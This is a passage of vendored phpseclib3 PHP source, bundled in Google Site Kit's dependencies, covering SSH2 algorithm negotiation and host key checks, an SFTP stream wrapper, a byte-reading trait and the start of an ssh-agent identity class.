AES and DES, however, the table lookups that are done // are done against substitution boxes (sboxes), which are invariant. // OpenSSL can't be used as an engine, either, because OpenSSL doesn't support continuous buffers // as SSH2 uses and altho you can emulate a continuous buffer with block ciphers you can't do so // with stream ciphers. As for ChaCha20... for the ChaCha20 part OpenSSL could prob be used but // the big slow down isn't with ChaCha20 - it's with Poly1305. SSH constructs the key for that // differently than how OpenSSL does it (OpenSSL does it as the RFC describes, SSH doesn't). // libsodium can't be used because it doesn't support RC4 and it doesn't construct the Poly1305 // keys in the same way that SSH does // mcrypt could prob be used for RC4 but mcrypt hasn't been included in PHP core for yearss case 'chacha20-poly1305@openssh.com': case 'arcfour128': case 'arcfour256': if ($engine != 'PHP') { continue 2; } break; case 'aes128-gcm@openssh.com': case 'aes256-gcm@openssh.com': if ($engine == 'OpenSSL') { continue 2; } $obj->setNonce('dummydummydu'); } if ($obj->isValidEngine($engine)) { $algos = \array_diff($algos, [$algo]); $ciphers[] = $algo; } } } return $ciphers; } /** * Returns a list of MAC algorithms that phpseclib supports * * @return array */ public static function getSupportedMACAlgorithms() { return [ 'hmac-sha2-256-etm@openssh.com', 'hmac-sha2-512-etm@openssh.com', 'hmac-sha1-etm@openssh.com', // from <http://www.ietf.org/rfc/rfc6668.txt>: 'hmac-sha2-256', // RECOMMENDED HMAC-SHA256 (digest length = key length = 32) 'hmac-sha2-512', // OPTIONAL HMAC-SHA512 (digest length = key length = 64) 'hmac-sha1-96', // RECOMMENDED first 96 bits of HMAC-SHA1 (digest length = 12, key length = 20) 'hmac-sha1', // REQUIRED HMAC-SHA1 (digest length = key length = 20) 'hmac-md5-96', // OPTIONAL first 96 bits of HMAC-MD5 (digest length = 12, key length = 16) 'hmac-md5', // OPTIONAL HMAC-MD5 (digest length = key length = 16) 'umac-64-etm@openssh.com', 'umac-128-etm@openssh.com', // from <https://tools.ietf.org/html/draft-miller-secsh-umac-01>: 'umac-64@openssh.com', 'umac-128@openssh.com', ]; } /** * Returns a list of compression algorithms that phpseclib supports * * @return array */ public static function getSupportedCompressionAlgorithms() { $algos = ['none']; // REQUIRED no compression if (\function_exists('deflate_init')) { $algos[] = 'zlib@openssh.com'; // https://datatracker.ietf.org/doc/html/draft-miller-secsh-compression-delayed $algos[] = 'zlib'; } return $algos; } /** * Return list of negotiated algorithms * * Uses the same format as https://www.php.net/ssh2-methods-negotiated * * @return array */ public function getAlgorithmsNegotiated() { $this->connect(); $compression_map = [self::NET_SSH2_COMPRESSION_NONE => 'none', self::NET_SSH2_COMPRESSION_ZLIB => 'zlib', self::NET_SSH2_COMPRESSION_ZLIB_AT_OPENSSH => 'zlib@openssh.com']; return ['kex' => $this->kex_algorithm, 'hostkey' => $this->signature_format, 'client_to_server' => ['crypt' => $this->encryptName, 'mac' => $this->hmac_create_name, 'comp' => $compression_map[$this->compress]], 'server_to_client' => ['crypt' => $this->decryptName, 'mac' => $this->hmac_check_name, 'comp' => $compression_map[$this->decompress]]]; } /** * Force multiple channels (even if phpseclib has decided to disable them) */ public function forceMultipleChannels() { $this->errorOnMultipleChannels = \false; } /** * Allows you to set the terminal * * @param string $term */ public function setTerminal($term) { $this->term = $term; } /** * Accepts an associative array with up to four parameters as described at * <https://www.php.net/manual/en/function.ssh2-connect.php> * * @param array $methods */ public function setPreferredAlgorithms(array $methods) { $keys = ['client_to_server', 'server_to_client']; if (isset($methods['kex']) && \is_string($methods['kex'])) { $methods['kex'] = \explode(',', $methods['kex']); } if (isset($methods['hostkey']) && \is_string($methods['hostkey'])) { $methods['hostkey'] = \explode(',', $methods['hostkey']); } foreach ($keys as $key) { if (isset($methods[$key])) { $a =& $methods[$key]; if (isset($a['crypt']) && \is_string($a['crypt'])) { $a['crypt'] = \explode(',', $a['crypt']); } if (isset($a['comp']) && \is_string($a['comp'])) { $a['comp'] = \explode(',', $a['comp']); } if (isset($a['mac']) && \is_string($a['mac'])) { $a['mac'] = \explode(',', $a['mac']); } } } $preferred = $methods; if (isset($preferred['kex'])) { $preferred['kex'] = \array_intersect($preferred['kex'], static::getSupportedKEXAlgorithms()); } if (isset($preferred['hostkey'])) { $preferred['hostkey'] = \array_intersect($preferred['hostkey'], static::getSupportedHostKeyAlgorithms()); } foreach ($keys as $key) { if (isset($preferred[$key])) { $a =& $preferred[$key]; if (isset($a['crypt'])) { $a['crypt'] = \array_intersect($a['crypt'], static::getSupportedEncryptionAlgorithms()); } if (isset($a['comp'])) { $a['comp'] = \array_intersect($a['comp'], static::getSupportedCompressionAlgorithms()); } if (isset($a['mac'])) { $a['mac'] = \array_intersect($a['mac'], static::getSupportedMACAlgorithms()); } } } $keys = ['kex', 'hostkey', 'client_to_server/crypt', 'client_to_server/comp', 'client_to_server/mac', 'server_to_client/crypt', 'server_to_client/comp', 'server_to_client/mac']; foreach ($keys as $key) { $p = $preferred; $m = $methods; $subkeys = \explode('/', $key); foreach ($subkeys as $subkey) { if (!isset($p[$subkey])) { continue 2; } $p = $p[$subkey]; $m = $m[$subkey]; } if (\count($p) != \count($m)) { $diff = \array_diff($m, $p); $msg = \count($diff) == 1 ? ' is not a supported algorithm' : ' are not supported algorithms'; throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException(\implode(', ', $diff) . $msg); } } $this->preferred = $preferred; } /** * Returns the banner message. * * Quoting from the RFC, "in some jurisdictions, sending a warning message before * authentication may be relevant for getting legal protection." * * @return string */ public function getBannerMessage() { return $this->banner_message; } /** * Returns the server public host key. * * Caching this the first time you connect to a server and checking the result on subsequent connections * is recommended. Returns false if the server signature is not signed correctly with the public host key. * * @return string|false * @throws \RuntimeException on badly formatted keys * @throws NoSupportedAlgorithmsException when the key isn't in a supported format */ public function getServerPublicHostKey() { if (!($this->bitmap & self::MASK_CONSTRUCTOR)) { $this->connect(); } $signature = $this->signature; $server_public_host_key = \base64_encode($this->server_public_host_key); if ($this->signature_validated) { return $this->bitmap ? $this->signature_format . ' ' . $server_public_host_key : \false; } $this->signature_validated = \true; switch ($this->signature_format) { case 'ssh-ed25519': case 'ecdsa-sha2-nistp256': case 'ecdsa-sha2-nistp384': case 'ecdsa-sha2-nistp521': $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC::loadFormat('OpenSSH', $server_public_host_key)->withSignatureFormat('SSH2'); switch ($this->signature_format) { case 'ssh-ed25519': $hash = 'sha512'; break; case 'ecdsa-sha2-nistp256': $hash = 'sha256'; break; case 'ecdsa-sha2-nistp384': $hash = 'sha384'; break; case 'ecdsa-sha2-nistp521': $hash = 'sha512'; } $key = $key->withHash($hash); break; case 'ssh-dss': $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA::loadFormat('OpenSSH', $server_public_host_key)->withSignatureFormat('SSH2')->withHash('sha1'); break; case 'ssh-rsa': case 'rsa-sha2-256': case 'rsa-sha2-512': // could be ssh-rsa, rsa-sha2-256, rsa-sha2-512 // we don't check here because we already checked in key_exchange // some signatures have the type embedded within the message and some don't list(, $signature) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('ss', $signature); $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA::loadFormat('OpenSSH', $server_public_host_key)->withPadding(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA::SIGNATURE_PKCS1); switch ($this->signature_format) { case 'rsa-sha2-512': $hash = 'sha512'; break; case 'rsa-sha2-256': $hash = 'sha256'; break; //case 'ssh-rsa': default: $hash = 'sha1'; } $key = $key->withHash($hash); break; default: $this->disconnect_helper(NET_SSH2_DISCONNECT_HOST_KEY_NOT_VERIFIABLE); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoSupportedAlgorithmsException('Unsupported signature format'); } if (!$key->verify($this->exchange_hash, $signature)) { return $this->disconnect_helper(NET_SSH2_DISCONNECT_HOST_KEY_NOT_VERIFIABLE); } return $this->signature_format . ' ' . $server_public_host_key; } /** * Returns the exit status of an SSH command or false. * * @return false|int */ public function getExitStatus() { if (\is_null($this->exit_status)) { return \false; } return $this->exit_status; } /** * Returns the number of columns for the terminal window size. * * @return int */ public function getWindowColumns() { return $this->windowColumns; } /** * Returns the number of rows for the terminal window size. * * @return int */ public function getWindowRows() { return $this->windowRows; } /** * Sets the number of columns for the terminal window size. * * @param int $value */ public function setWindowColumns($value) { $this->windowColumns = $value; } /** * Sets the number of rows for the terminal window size. * * @param int $value */ public function setWindowRows($value) { $this->windowRows = $value; } /** * Sets the number of columns and rows for the terminal window size. * * @param int $columns * @param int $rows */ public function setWindowSize($columns = 80, $rows = 24) { $this->windowColumns = $columns; $this->windowRows = $rows; } /** * To String Magic Method * * @return string */ #[\ReturnTypeWillChange] public function __toString() { return $this->getResourceId(); } /** * Get Resource ID * * We use {} because that symbols should not be in URL according to * {@link http://tools.ietf.org/html/rfc3986#section-2 RFC}. * It will safe us from any conflicts, because otherwise regexp will * match all alphanumeric domains. * * @return string */ public function getResourceId() { return '{' . \spl_object_hash($this) . '}'; } /** * Return existing connection * * @param string $id * * @return bool|SSH2 will return false if no such connection */ public static function getConnectionByResourceId($id) { if (isset(self::$connections[$id])) { return self::$connections[$id] instanceof \WeakReference ? self::$connections[$id]->get() : self::$connections[$id]; } return \false; } /** * Return all excising connections * * @return array<string, SSH2> */ public static function getConnections() { if (!\class_exists('WeakReference')) { /** @var array<string, SSH2> */ return self::$connections; } $temp = []; foreach (self::$connections as $key => $ref) { $temp[$key] = $ref->get(); } return $temp; } /* * Update packet types in log history * * @param string $old * @param string $new */ private function updateLogHistory($old, $new) { if (\defined('Google\\Site_Kit_Dependencies\\NET_SSH2_LOGGING') && NET_SSH2_LOGGING == self::LOG_COMPLEX) { $this->message_number_log[\count($this->message_number_log) - 1] = \str_replace($old, $new, $this->message_number_log[\count($this->message_number_log) - 1]); } } /** * Return the list of authentication methods that may productively continue authentication. * * @see https://tools.ietf.org/html/rfc4252#section-5.1 * @return array|null */ public function getAuthMethodsToContinue() { return $this->auth_methods_to_continue; } /** * Enables "smart" multi-factor authentication (MFA) */ public function enableSmartMFA() { $this->smartMFA = \true; } /** * Disables "smart" multi-factor authentication (MFA) */ public function disableSmartMFA() { $this->smartMFA = \false; } /** * How many bytes until the next key re-exchange? * * @param int $bytes */ public function bytesUntilKeyReexchange($bytes) { $this->doKeyReexchangeAfterXBytes = $bytes; } } <?php /** * SFTP Stream Wrapper * * Creates an sftp:// protocol handler that can be used with, for example, fopen(), dir(), etc. * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2013 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Net\SFTP; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey; use Google\Site_Kit_Dependencies\phpseclib3\Net\SFTP; use Google\Site_Kit_Dependencies\phpseclib3\Net\SSH2; /** * SFTP Stream Wrapper * * @author Jim Wigginton <terrafrost@php.net> */ class Stream { /** * SFTP instances * * Rather than re-create the connection we re-use instances if possible * * @var array */ public static $instances; /** * SFTP instance * * @var object */ private $sftp; /** * Path * * @var string */ private $path; /** * Mode * * @var string */ private $mode; /** * Position * * @var int */ private $pos; /** * Size * * @var int */ private $size; /** * Directory entries * * @var array */ private $entries; /** * EOF flag * * @var bool */ private $eof; /** * Context resource * * Technically this needs to be publicly accessible so PHP can set it directly * * @var resource */ public $context; /** * Notification callback function * * @var callable */ private $notification; /** * Registers this class as a URL wrapper. * * @param string $protocol The wrapper name to be registered. * @return bool True on success, false otherwise. */ public static function register($protocol = 'sftp') { if (\in_array($protocol, \stream_get_wrappers(), \true)) { return \false; } return \stream_wrapper_register($protocol, \get_called_class()); } /** * The Constructor * */ public function __construct() { if (\defined('Google\\Site_Kit_Dependencies\\NET_SFTP_STREAM_LOGGING')) { echo "__construct()\r\n"; } } /** * Path Parser * * Extract a path from a URI and actually connect to an SSH server if appropriate * * If "notification" is set as a context parameter the message code for successful login is * NET_SSH2_MSG_USERAUTH_SUCCESS. For a failed login it's NET_SSH2_MSG_USERAUTH_FAILURE. * * @param string $path * @return string */ protected function parse_path($path) { $orig = $path; \extract(\parse_url($path) + ['port' => 22]); if (isset($query)) { $path .= '?' . $query; } elseif (\preg_match('/(\\?|\\?#)$/', $orig)) { $path .= '?'; } if (isset($fragment)) { $path .= '#' . $fragment; } elseif ($orig[\strlen($orig) - 1] == '#') { $path .= '#'; } if (!isset($host)) { return \false; } if (isset($this->context)) { $context = \stream_context_get_params($this->context); if (isset($context['notification'])) { $this->notification = $context['notification']; } } if (\preg_match('/^{[a-z0-9]+}$/i', $host)) { $host = \Google\Site_Kit_Dependencies\phpseclib3\Net\SSH2::getConnectionByResourceId($host); if ($host === \false) { return \false; } $this->sftp = $host; } else { if (isset($this->context)) { $context = \stream_context_get_options($this->context); } if (isset($context[$scheme]['session'])) { $sftp = $context[$scheme]['session']; } if (isset($context[$scheme]['sftp'])) { $sftp = $context[$scheme]['sftp']; } if (isset($sftp) && $sftp instanceof \Google\Site_Kit_Dependencies\phpseclib3\Net\SFTP) { $this->sftp = $sftp; return $path; } if (isset($context[$scheme]['username'])) { $user = $context[$scheme]['username']; } if (isset($context[$scheme]['password'])) { $pass = $context[$scheme]['password']; } if (isset($context[$scheme]['privkey']) && $context[$scheme]['privkey'] instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey) { $pass = $context[$scheme]['privkey']; } if (!isset($user) || !isset($pass)) { return \false; } // casting $pass to a string is necessary in the event that it's a \phpseclib3\Crypt\RSA object if (isset(self::$instances[$host][$port][$user][(string) $pass])) { $this->sftp = self::$instances[$host][$port][$user][(string) $pass]; } else { $this->sftp = new \Google\Site_Kit_Dependencies\phpseclib3\Net\SFTP($host, $port); $this->sftp->disableStatCache(); if (isset($this->notification) && \is_callable($this->notification)) { /* if !is_callable($this->notification) we could do this: user_error('fopen(): failed to call user notifier', E_USER_WARNING); the ftp wrapper gives errors like that when the notifier isn't callable. i've opted not to do that, however, since the ftp wrapper gives the line on which the fopen occurred as the line number - not the line that the user_error is on. */ \call_user_func($this->notification, \STREAM_NOTIFY_CONNECT, \STREAM_NOTIFY_SEVERITY_INFO, '', 0, 0, 0); \call_user_func($this->notification, \STREAM_NOTIFY_AUTH_REQUIRED, \STREAM_NOTIFY_SEVERITY_INFO, '', 0, 0, 0); if (!$this->sftp->login($user, $pass)) { \call_user_func($this->notification, \STREAM_NOTIFY_AUTH_RESULT, \STREAM_NOTIFY_SEVERITY_ERR, 'Login Failure', NET_SSH2_MSG_USERAUTH_FAILURE, 0, 0); return \false; } \call_user_func($this->notification, \STREAM_NOTIFY_AUTH_RESULT, \STREAM_NOTIFY_SEVERITY_INFO, 'Login Success', NET_SSH2_MSG_USERAUTH_SUCCESS, 0, 0); } else { if (!$this->sftp->login($user, $pass)) { return \false; } } self::$instances[$host][$port][$user][(string) $pass] = $this->sftp; } } return $path; } /** * Opens file or URL * * @param string $path * @param string $mode * @param int $options * @param string $opened_path * @return bool */ private function _stream_open($path, $mode, $options, &$opened_path) { $path = $this->parse_path($path); if ($path === \false) { return \false; } $this->path = $path; $this->size = $this->sftp->filesize($path); $this->mode = \preg_replace('#[bt]$#', '', $mode); $this->eof = \false; if ($this->size === \false) { if ($this->mode[0] == 'r') { return \false; } else { $this->sftp->touch($path); $this->size = 0; } } else { switch ($this->mode[0]) { case 'x': return \false; case 'w': $this->sftp->truncate($path, 0); $this->size = 0; } } $this->pos = $this->mode[0] != 'a' ? 0 : $this->size; return \true; } /** * Read from stream * * @param int $count * @return mixed */ private function _stream_read($count) { switch ($this->mode) { case 'w': case 'a': case 'x': case 'c': return \false; } // commented out because some files - eg. /dev/urandom - will say their size is 0 when in fact it's kinda infinite //if ($this->pos >= $this->size) { // $this->eof = true; // return false; //} $result = $this->sftp->get($this->path, \false, $this->pos, $count); if (isset($this->notification) && \is_callable($this->notification)) { if ($result === \false) { \call_user_func($this->notification, \STREAM_NOTIFY_FAILURE, \STREAM_NOTIFY_SEVERITY_ERR, $this->sftp->getLastSFTPError(), NET_SFTP_OPEN, 0, 0); return 0; } // seems that PHP calls stream_read in 8k chunks \call_user_func($this->notification, \STREAM_NOTIFY_PROGRESS, \STREAM_NOTIFY_SEVERITY_INFO, '', 0, \strlen($result), $this->size); } if (empty($result)) { // ie. false or empty string $this->eof = \true; return \false; } $this->pos += \strlen($result); return $result; } /** * Write to stream * * @param string $data * @return int|false */ private function _stream_write($data) { switch ($this->mode) { case 'r': return \false; } $result = $this->sftp->put($this->path, $data, \Google\Site_Kit_Dependencies\phpseclib3\Net\SFTP::SOURCE_STRING, $this->pos); if (isset($this->notification) && \is_callable($this->notification)) { if (!$result) { \call_user_func($this->notification, \STREAM_NOTIFY_FAILURE, \STREAM_NOTIFY_SEVERITY_ERR, $this->sftp->getLastSFTPError(), NET_SFTP_OPEN, 0, 0); return 0; } // seems that PHP splits up strings into 8k blocks before calling stream_write \call_user_func($this->notification, \STREAM_NOTIFY_PROGRESS, \STREAM_NOTIFY_SEVERITY_INFO, '', 0, \strlen($data), \strlen($data)); } if ($result === \false) { return \false; } $this->pos += \strlen($data); if ($this->pos > $this->size) { $this->size = $this->pos; } $this->eof = \false; return \strlen($data); } /** * Retrieve the current position of a stream * * @return int */ private function _stream_tell() { return $this->pos; } /** * Tests for end-of-file on a file pointer * * In my testing there are four classes functions that normally effect the pointer: * fseek, fputs / fwrite, fgets / fread and ftruncate. * * Only fgets / fread, however, results in feof() returning true. do fputs($fp, 'aaa') on a blank file and feof() * will return false. do fread($fp, 1) and feof() will then return true. do fseek($fp, 10) on ablank file and feof() * will return false. do fread($fp, 1) and feof() will then return true. * * @return bool */ private function _stream_eof() { return $this->eof; } /** * Seeks to specific location in a stream * * @param int $offset * @param int $whence * @return bool */ private function _stream_seek($offset, $whence) { switch ($whence) { case \SEEK_SET: if ($offset < 0) { return \false; } break; case \SEEK_CUR: $offset += $this->pos; break; case \SEEK_END: $offset += $this->size; } $this->pos = $offset; $this->eof = \false; return \true; } /** * Change stream options * * @param string $path * @param int $option * @param mixed $var * @return bool */ private function _stream_metadata($path, $option, $var) { $path = $this->parse_path($path); if ($path === \false) { return \false; } // stream_metadata was introduced in PHP 5.4.0 but as of 5.4.11 the constants haven't been defined // see http://www.php.net/streamwrapper.stream-metadata and https://bugs.php.net/64246 // and https://github.com/php/php-src/blob/master/main/php_streams.h#L592 switch ($option) { case 1: // PHP_STREAM_META_TOUCH $time = isset($var[0]) ? $var[0] : null; $atime = isset($var[1]) ? $var[1] : null; return $this->sftp->touch($path, $time, $atime); case 2: // PHP_STREAM_OWNER_NAME case 3: // PHP_STREAM_GROUP_NAME return \false; case 4: // PHP_STREAM_META_OWNER return $this->sftp->chown($path, $var); case 5: // PHP_STREAM_META_GROUP return $this->sftp->chgrp($path, $var); case 6: // PHP_STREAM_META_ACCESS return $this->sftp->chmod($path, $var) !== \false; } } /** * Retrieve the underlaying resource * * @param int $cast_as * @return resource */ private function _stream_cast($cast_as) { return $this->sftp->fsock; } /** * Advisory file locking * * @param int $operation * @return bool */ private function _stream_lock($operation) { return \false; } /** * Renames a file or directory * * Attempts to rename oldname to newname, moving it between directories if necessary. * If newname exists, it will be overwritten. This is a departure from what \phpseclib3\Net\SFTP * does. * * @param string $path_from * @param string $path_to * @return bool */ private function _rename($path_from, $path_to) { $path1 = \parse_url($path_from); $path2 = \parse_url($path_to); unset($path1['path'], $path2['path']); if ($path1 != $path2) { return \false; } $path_from = $this->parse_path($path_from); $path_to = \parse_url($path_to); if ($path_from === \false) { return \false; } $path_to = $path_to['path']; // the $component part of parse_url() was added in PHP 5.1.2 // "It is an error if there already exists a file with the name specified by newpath." // -- http://tools.ietf.org/html/draft-ietf-secsh-filexfer-02#section-6.5 if (!$this->sftp->rename($path_from, $path_to)) { if ($this->sftp->stat($path_to)) { return $this->sftp->delete($path_to, \true) && $this->sftp->rename($path_from, $path_to); } return \false; } return \true; } /** * Open directory handle * * The only $options is "whether or not to enforce safe_mode (0x04)". Since safe mode was deprecated in 5.3 and * removed in 5.4 I'm just going to ignore it. * * Also, nlist() is the best that this function is realistically going to be able to do. When an SFTP client * sends a SSH_FXP_READDIR packet you don't generally get info on just one file but on multiple files. Quoting * the SFTP specs: * * The SSH_FXP_NAME response has the following format: * * uint32 id * uint32 count * repeats count times: * string filename * string longname * ATTRS attrs * * @param string $path * @param int $options * @return bool */ private function _dir_opendir($path, $options) { $path = $this->parse_path($path); if ($path === \false) { return \false; } $this->pos = 0; $this->entries = $this->sftp->nlist($path); return $this->entries !== \false; } /** * Read entry from directory handle * * @return mixed */ private function _dir_readdir() { if (isset($this->entries[$this->pos])) { return $this->entries[$this->pos++]; } return \false; } /** * Rewind directory handle * * @return bool */ private function _dir_rewinddir() { $this->pos = 0; return \true; } /** * Close directory handle * * @return bool */ private function _dir_closedir() { return \true; } /** * Create a directory * * Only valid $options is STREAM_MKDIR_RECURSIVE * * @param string $path * @param int $mode * @param int $options * @return bool */ private function _mkdir($path, $mode, $options) { $path = $this->parse_path($path); if ($path === \false) { return \false; } return $this->sftp->mkdir($path, $mode, $options & \STREAM_MKDIR_RECURSIVE); } /** * Removes a directory * * Only valid $options is STREAM_MKDIR_RECURSIVE per <http://php.net/streamwrapper.rmdir>, however, * <http://php.net/rmdir> does not have a $recursive parameter as mkdir() does so I don't know how * STREAM_MKDIR_RECURSIVE is supposed to be set. Also, when I try it out with rmdir() I get 8 as * $options. What does 8 correspond to? * * @param string $path * @param int $options * @return bool */ private function _rmdir($path, $options) { $path = $this->parse_path($path); if ($path === \false) { return \false; } return $this->sftp->rmdir($path); } /** * Flushes the output * * See <http://php.net/fflush>. Always returns true because \phpseclib3\Net\SFTP doesn't cache stuff before writing * * @return bool */ private function _stream_flush() { return \true; } /** * Retrieve information about a file resource * * @return mixed */ private function _stream_stat() { $results = $this->sftp->stat($this->path); if ($results === \false) { return \false; } return $results; } /** * Delete a file * * @param string $path * @return bool */ private function _unlink($path) { $path = $this->parse_path($path); if ($path === \false) { return \false; } return $this->sftp->delete($path, \false); } /** * Retrieve information about a file * * Ignores the STREAM_URL_STAT_QUIET flag because the entirety of \phpseclib3\Net\SFTP\Stream is quiet by default * might be worthwhile to reconstruct bits 12-16 (ie. the file type) if mode doesn't have them but we'll * cross that bridge when and if it's reached * * @param string $path * @param int $flags * @return mixed */ private function _url_stat($path, $flags) { $path = $this->parse_path($path); if ($path === \false) { return \false; } $results = $flags & \STREAM_URL_STAT_LINK ? $this->sftp->lstat($path) : $this->sftp->stat($path); if ($results === \false) { return \false; } return $results; } /** * Truncate stream * * @param int $new_size * @return bool */ private function _stream_truncate($new_size) { if (!$this->sftp->truncate($this->path, $new_size)) { return \false; } $this->eof = \false; $this->size = $new_size; return \true; } /** * Change stream options * * STREAM_OPTION_WRITE_BUFFER isn't supported for the same reason stream_flush isn't. * The other two aren't supported because of limitations in \phpseclib3\Net\SFTP. * * @param int $option * @param int $arg1 * @param int $arg2 * @return bool */ private function _stream_set_option($option, $arg1, $arg2) { return \false; } /** * Close an resource * */ private function _stream_close() { } /** * __call Magic Method * * When you're utilizing an SFTP stream you're not calling the methods in this class directly - PHP is calling them for you. * Which kinda begs the question... what methods is PHP calling and what parameters is it passing to them? This function * lets you figure that out. * * If NET_SFTP_STREAM_LOGGING is defined all calls will be output on the screen and then (regardless of whether or not * NET_SFTP_STREAM_LOGGING is enabled) the parameters will be passed through to the appropriate method. * * @param string $name * @param array $arguments * @return mixed */ public function __call($name, array $arguments) { if (\defined('Google\\Site_Kit_Dependencies\\NET_SFTP_STREAM_LOGGING')) { echo $name . '('; $last = \count($arguments) - 1; foreach ($arguments as $i => $argument) { \var_export($argument); if ($i != $last) { echo ','; } } echo ")\r\n"; } $name = '_' . $name; if (!\method_exists($this, $name)) { return \false; } return $this->{$name}(...$arguments); } } <?php /** * ReadBytes trait * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\System\SSH\Common\Traits; /** * ReadBytes trait * * @author Jim Wigginton <terrafrost@php.net> */ trait ReadBytes { /** * Read data * * @param int $length * @throws \RuntimeException on connection errors */ public function readBytes($length) { $temp = \fread($this->fsock, $length); if (\strlen($temp) != $length) { throw new \RuntimeException("Expected {$length} bytes; got " . \strlen($temp)); } return $temp; } } <?php /** * Pure-PHP ssh-agent client. * * {@internal See http://api.libssh.org/rfc/PROTOCOL.agent} * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2009 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\System\SSH\Agent; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PublicKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException; use Google\Site_Kit_Dependencies\phpseclib3\System\SSH\Agent; use Google\Site_Kit_Dependencies\phpseclib3\System\SSH\Common\Traits\ReadBytes; /** * Pure-PHP ssh-agent client identity object * * Instantiation should only be performed by \phpseclib3\System\SSH\Agent class. * This could be thought of as implementing an interface that phpseclib3\Crypt\RSA * implements. ie. maybe a Net_SSH_Auth_PublicKey interface or something. * The methods in this interface would be getPublicKey and sign since those are the * methods phpseclib looks for to perform public key authentication. * * @author Jim Wigginton <terrafrost@php.net> * @internal */ class Identity implements \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey { use ReadBytes; // Signature Flags // See https://tools.ietf.org/html/draft-miller-ssh-agent-00#section-5.3 const SSH_AGENT_RSA2_256 = 2; const SSH_AGENT_RSA2_512 = 4; /** * Key Object * * @var PublicKey * @see self::getPublicKey() */ private $key; /** * Key Blob * * @var string * @see self::sign() */ private $key_blob; /** * Socket Resource * * @var resource * @see self::sign() */ private $fsock; /** * Signature flags * * @var int * @see self::sign() * @see self::setHash() */ private $flags = 0; /** * Comment * * @var null|string */ private $comment; /** * Curve Aliases * * @var array */ private static $curveAliases = ['secp256r1' => 'nistp256', 'secp384r1' => 'nistp384', 'secp521r1' => 'nistp521', 'Ed25519' => 'Ed25519']; /** * Default Constructor. * * @param resource $fsock */ public function __construct($fsock) { $this->fsock = $fsock; } /** * Set Public Key * * Called by \phpseclib3\System\SSH\Agent::requestIdentities() * * @param PublicKey $key */ public function withPublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PublicKey $key) { if ($key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC) { if (\is_array($key->getCurve()) || !isset(self::$curveAliases[$key->getCurve()])) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('The only supported curves are nistp256, nistp384, nistp512 and Ed25519'); } } $new = clone $this; $new->key = $key; return $new; } /** * Set Public Key * * Called by \phpseclib3\System\SSH\Agent::requestIdentities(). The key blob could be extracted from $this->key * but this saves a small amount of computation. * * @param string $key_blob */ public function withPublicKeyBlob($key_blob) { $new = clone $this; $new->key_blob = $key_blob; return $new; } /** * Get Public Key * * Wrapper for $this->key->getPublicKey() * * @return mixed */ public function getPublicKey() { return $this->key; } /** * Sets the hash * * @param string $hash */ public function withHash($hash) { $new = clone $this; $hash = \strtolower($hash); if ($this->key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA) { $new->flags = 0; switch ($hash) { case 'sha1': break; case 'sha256': $new->flags = self::SSH_AGENT_RSA2_256; break; case 'sha512': $new->flags = self::SSH_AGENT_RSA2_512; break; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('The only supported hashes for RSA are sha1, sha256 and sha512'); } } if ($this->key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC) { switch ($this->key->getCurve()) { case 'secp256r1': $expectedHash = 'sha256'; break; case 'secp384r1': $expectedHash = 'sha384'; break; //case 'secp521r1': //case 'Ed25519': default: $expectedHash = 'sha512'; } if ($hash != $expectedHash) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('The only supported hash for ' . self::$curveAliases[$this->key->getCurve()] . ' is ' . $expectedHash); } } if ($this->key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA) { if ($hash != 'sha1') { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('The only supported hash for DSA is sha1'); } } return $new; } /** * Sets the padding * * Only PKCS1 padding is supported * * @param string $padding */ public function withPadding($padding) { if (!$this->key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('Only RSA keys support padding'); } if ($padding != \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA::SIGNATURE_PKCS1 && $padding != \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA::SIGNATURE_RELAXED_PKCS1) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('ssh-agent can only create PKCS1 signatures'); } return $this; } /** * Determines the signature padding mode * * Valid values are: ASN1, SSH2, Raw * * @param string $format */ public function withSignatureFormat($format) { if 